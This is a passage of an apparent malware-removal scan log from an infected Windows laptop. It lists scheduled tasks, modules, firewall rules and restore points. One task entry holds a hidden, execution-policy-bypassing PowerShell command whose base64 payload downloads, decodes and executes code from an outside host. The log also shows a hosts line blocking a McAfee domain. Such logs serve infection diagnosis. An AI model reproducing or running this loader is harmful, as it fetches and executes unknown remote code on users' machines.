C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] () Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG8AcABlAG4AeQBlAHMALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGkAegA3ADkAWQBjAGsAcQB6AFEARABQAHAAagB4AFYAQwAxAE4AdgBjAHQAWQBXAHQAWQBlAG4AeABjAFUATgBLAHIAVABaAGYAZQBXAFIARwBCAHgAMwB5AHYAYgBpAGMARwB5ADMARABsAFgAOABkAEMAMQBiAHcARgBoAF8AdwB2AE4ATwAxAE4ANgBqAHoARQA4AFUAagAyAGoAawA1AHUAVwAyAFUAQwA1AHEAWQBOADQAdgBfAHcANABRADQAQwBiAEYAdgBaADcAcgB5AEsATAAwADYANwBKAEYATgBOAGcAVgB5AGYAQQBBAHQANgBnAEkAMQBZAGIAbQBHAFcAQQBoAGkATABxAGUAQQA3ADgAeAAtAF8ASwBRADYAMwBUAHMAdgB1AEsAcwBBAGgAaQB0AGQAQwBPAFAAOQBXADgAOQAyAFYATgBVAEMAcABaADAATAB5AGoASwB2AGYARABjAEcAcwB3AG0AdgBqAF8ANQBYAFIANwBDAGMAWQA2AC0AbwBUADAAQQAwAFUAOABpAFQAcgA2AFYASQBRAFYAdgByAE8AUABrAEUATABTAGsARQBSAFIAegB6AEgAQQBUAG0AcQBRAHgANwBPAGsAUQBFAE0AbQBWAG0ANQBlAGgAWgBnAFQAVQB2AGIAWQBlAHMATQBYAE4ANABLAEIATgBPAGcAYgBUAFQASABqAE8AZABuAHMARQBiAGQAMABpAFUAdgB1AEcAeAAyAEYATwBIAHoAQwBWAHYAQwB1AG0AdgAzAEQAVABLAHkAMwBQADIAMwBvADUAaABwAGcASQBYAFUASABvAGsAZwBKAEYAZwBkAFIAawBPAHAAYwBjAE4AZABoAFgASwBnAGgAVgBOAGkAZQAyAGQATQBIAHQAZgBuAGcAUgA0AFQARQBQAEkAagA4AGwAYwBoADYAYQB4AFMAMAB1AEoAWQBvAGMAWQBzAG4AeAB6AEYAVwBEAHQAeQB5AHYARAAxAGQASwBZAGcAUwA4AHkAQQBKAGcAcwBoAGkAVgBzADcARAB1AHgAcwBLAGIAdAB2ADUARABlAGgAcQBBAEQARAAzAG4AdgBZAE8AagBnAE0AdQBqAEMAcQBPAFQATwAtAEYAWABuAEoAOABUAG4ARwBxAG4AUAAyAGcASgBJAGoAYgA2AEcAYwBLADQAbABLADEAawAyAGMANwBGAGQAYQBTADYAMABfAHMAdAB5AEkAYgBJAC0AcQBQAHUAbwBOAGQAZwBkAFcAQgB6AC0AZAB5ADgAbwB4ADAAbgBnAGEAZgBVAHQAVABDAGsAdgBsADYAWgA5AHUAUQBrADMAMABYAGMAZwBoAFQAdwBuADgAUwByAFQAbQB1AGEAYgBtAEwANABOAEYAMABrAGIAYgAyAGcASwB5AEEAQgBNAHkAcgBFAEIAQwA4AFAAXwB2AFgAVABiAHEAbwBOAEQAZABVAGYANgB6AHUATABKADUATwBZAEcAOQBHAC0AdwBOAFIAMAA2ADEAMgA2AGEAaABZAHcAaQBvAFIANQBkAG0AUAAwAHEAZABkAHgAcQBsAGgAXwBxAGgAOAByAFYATABSAEMANgBnAHkAbgA1AF8ATQBOAE8AOABIADkAUQBlAEcAZAB0AEsAMwAxADQAcgA1AFIAYQBFAC0AWQBHAFgAdAAtAE4AQwBoAGcANwBMADkAbQBWAFMAZABiAHoAQwB3AG4AcABNAEoARABMADQAUgBVAEIAMABSAHkAZgBfAHEAegBWAG4ASQBDAHkAdQBlAFoAYQBoAEwAWgBEADQAcwA4AFIANQBtAGIAUQA4AE0AZQBMAHYAbgBFAG4ASABKAEkAQwBsAGcAMwBnAGgATgBNAGoAUABDAEQAMwBDAEYAVgBhAGsAMQBYAHAARwA4AEMASQBpADEAQgBnAE4AeQB0AGEAagAzAGIAbgBkAG8AeQBDAHgASwB1AG8AeABiAE0AQQB6AFgATABNAHQAaABjADkAbAA3ADMANgAxAGUAQwBoAHkAUAA4AHgAdQBOAEYAVwBWAGUAeABOAGoAawBzADEANwB5AFMAUgByADkAYwBxAEUATAByADYAUgByAFcAWAB1AFYATgAyADkANwBJADIANAB0ADEAcwBrAE8AcwBQAGcAawBUAE0ASQBDAEMAXwBqAHIAUgA4AHIAMwBxAFAANQAyAHYAdABNADIANQB5AHkAUABMAE8AeQBnADEAYQAwADAAVQBjAEYAYQBtAHIAWQBoAGsASQBPAHQATABTAFAAZQB6AE8ASAA5AG4AYQBjAEsARABqAHMAQwBkADYAYgBqAFkAagBDAFMAMgB2AFQAXwB5ADYAQgAzAFUAagBhAEQAaAAwADkARQBYAGIAeABhAFYAJgBjAD0AdAA2AG4AcwA4AEkAMABBAFMANgBqAGgASQBxADkAYQBqAGsAZwAzADkAYQB4AHMAWQBHAFgASgBnAHEARwA2ADcAOQBmAGwAQQBPAEYAbgBPAE0ANAAwAFEARAAxAFkANgBpAE0ARgBWADUAOAAxAEcAMgBPAEoAUQBOAHMAOAB0ADAAbgBNAGkAdwBzAE4ASgA0AE0AMwBZAGUAVgBmAEcAdQBfADYAYQBRAF8ARQBaAG4AMgBEAGIARABRAF8AVAB5AEwAMwBXAG8AdgBuAFYAOAA1AF8AZgBmAGwAOQBYAEYAbgBsAFAAeQBYAFEAOAByAGUAZQBhAGYANgB3AFIAZQBXAE0AUQBXAGkAagA2ADEAeAAtAFQAWABzAHEANgBCAFoAVgBpADIAMABaADQAVQBLAE8AeAB1AFcAbgBFAHUAeQBrAGQAaQBEAHIAYwA5AGgAVwBIAGYANwBjAG0AeABVAHAAawBLAG8ASgAtAHQAXwA2ADQAUgB0AFoATQA2ADQAYwA0AG8ARwAzAEcAaABjAHkAMQB0AFkARQBrAE4AXwB0AF8AQwBoADEAVgBDADMAdABIAFIAcABwAGsAZQBMADIAVQBjADkATgA3AF8AUQBhAFEASQBqADUARwA3AHkAMwBEAHUAMwB2AGIAXwB0AFkANwBmAFYAcgBTADMARQB5ADUANwB5AGUAWQBZAEgAaQBLAHgATwBPADQAQwBIAHoANABmAG4ARgBGADIAMABJAGkAagB1AHgAVABNAG4AaABBAEMAMwBCAHEASwAtAGcAXwBJAG0ANgBPAE0AQgBIAGwAZwAwAHYAZwBOAEQAWAAtADUAdQB4AGIATgBnAFMAeQBsAGUASwBjAFgAYgBQAHQAbgBpAGoAMQBnAEEAXwBtAGkALQBxAGQASwB3AHUAbgBvAF8AOQBLAG4AMwBPADkAQwBWAFYAVABSAC0AdQBTAFAAUgBLAEcAMwBIAEQATAB6AGgAWABQAEsAMABEADgATQBJADkAeQB5AE4AZgBIAFEAYQBWAE0AMwBuAC0AYQBiAGgAWQBpAFgASwBwADkATgA0AHgANgB2AEsAeABNAGYASQBrAEEARwB6ADIARABCAGkAeQA3AFcANgBVAHcAbQBjADUAaABmAGQASAB5AFUAUAA5AHQAagB0AEMAVwBvAE0AYQBuAFIAbwBRAFgAZwBYADgAdABFADAAdwAxAHIAVwBjAGUAYgBGADYAVgBkAG8AdgA4ADUANQBoAG8AYgBoAHIASgBKAEMAcAB6ADkATAB3AFkAYwBOAGkAdABlAEYAUQBqAHIAUAB0AGcAUQBoAGoAWgA2AFoAaQBiAGsARgBjAFgANAA4AFUAaABWAGUATABNAEEAUgBwAHMAbQBIAHYALQB3AGsAVwBqAHkANQBnAFUAdgB6AEcAOQBRAEUAbQA0AGMAYQBFAEMAWAB0ADMASQA1ADkAeQBhAEUAcQBoAFYAWQB5AHEAeQBmAEUAeQBuAF8AZAA3AHYANQBDADAATgA5AG8AQQBIAE4AeQByAF8AQwBVAFgATgBXAE4AdgA5AEMAbABVAGgATwAyAHIARQBRAFYAQQByAEEAcwBHAGEAUQBSADYAdABYAFIAVgA5AE0AVQAwAGEAMwBRAEcAUgBrAHkAcQBWADkAUABHAEEAUABRAEIAdABCAGsAaABQAHcARABVAGcAbQBOAEoAbQBSAFgANgBuAHAAcwBOAGgAcQBOAGYAMQBxAG8ARAA0AHkANwBwAFIAaAA1AGQAUgBpAHIAcwBaAHYAZAA1AGcAcgBqAGcASwBEAEMAMQBFAGoANwBPAG0AMwBXAGkAMQBwAGIAUgBfAHEAMwBRAEMAQQBlAFkATwA1ADkAdQBqAHkAVwB2AG4AdwA4ADIAdAAzAFgANwBPAE4AZwBMADkANwB0AC0AdwBNADMAWAAxAGoARwA0AGsAVQBsAEYAQQBtAHEAVwBxAHUAQgBpAHgAWAAxAFMAZgB1AEcATAA1ADAAQQBNAEkAbQBjAHAAOABqAGkAMABDAFgAaQBtADEAcQBaAGcASwBfAFIAdQB2AEYAcgA3ADUAcQBCAG4ASABpADYATgBZAF8AVwBmAFAAdgBtADgAMQBHAEQAOABWAHYAZgBFAEcAZABJAFMANgBkAEoAUgBRAG0ATwBvADgAUwBIAHEAdQBSAFoAegA0AEEAUQBjAGYATQBSAE0AaQBDAGoAawBVADcAcABTAFAAagBlAGMAZwA5AF8AUQBqAEcAUQBTAHcANABiAFcAVwBDAFgAXwA4AEQATgBSAEUAcgB5AGMAMgBQAFMARgB5AHkAMwBaAEcAdwBHAGYAeQBnAHEAUABiADMAQwB6AFoAVgBOAGIAUQA0AFMAcwBOAGQALQB5AEIAUQBYAFAANQBPADYAMwBVAFAAXwB3AG8AaQBuAGcARQBjAFIARwBEAEcAQQBrAFUAdQBNAEQASwBIAFEAbQAzAGsAVQBOAGcANQBlACYAcgA9ADQANAA4ADgANAAxADIANQA5ADEANAAxADkANAAyADQAMwA1ADYAIgA7ACQAcwB0AHMAawA9ACIAewA3AEUANwA4ADAARAA0ADcALQAwAEQAMABCAC0AMABFADAANQAtADAAOQAxADEALQAwAEYAMABDADAAOAAwAEEAMQAxADcARAB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIASQBMAE8ASABGAFAASwBRACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated) Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll 2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL 2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll 2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll 2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll 2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll 2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll 2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll 2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll 2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll 2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll 2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx 2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMediaLibrary.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts 0.0.0.1 mssplus.mcafee.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg DNS Servers: Media is not connected to internet. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80 FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80 FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80 FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869 FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900 FirewallRules: [{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Restore Points ========================= 06-09-2015 10:16:38 Windows Update 09-09-2015 11:00:57 Windows Update 10-09-2015 18:07:18 Windows Update 15-09-2015 07:55:18 Windows Update 18-09-2015 17:16:42 Windows Update 22-09-2015 14:11:34 Windows Update 26-09-2015 09:52:55 Windows Update 30-09-2015 10:34:26 Windows Update 03-10-2015 14:53:55 Windows Update 07-10-2015 17:52:14 Windows Update 11-10-2015 19:12:09 Windows Update 14-10-2015 19:51:23 Windows Update 15-10-2015 09:28:46 Windows Update 19-10-2015 11:40:48 Windows Update 22-10-2015 17:02:18 Windows Update 29-10-2015 19:01:20 Windows Update 03-11-2015 10:52:06 Windows Update 08-11-2015 11:52:57 Windows Update 12-11-2015 20:50:58 Windows Update 12-11-2015 21:46:25 Windows Update 16-11-2015 15:08:37 Windows Update 20-11-2015 19:26:46 